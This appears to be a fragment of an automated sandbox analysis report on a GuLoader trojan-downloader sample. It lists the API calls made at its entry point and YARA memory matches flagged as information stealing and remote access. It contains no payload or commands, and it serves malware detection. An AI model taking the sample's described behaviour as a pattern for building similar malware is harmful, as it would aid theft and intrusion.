Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640

Stealing of Sensitive Information

Source: Yara match File source: 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe PID: 996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ios.exe PID: 8752, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe PID: 996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ios.exe PID: 8752, type: MEMORYSTR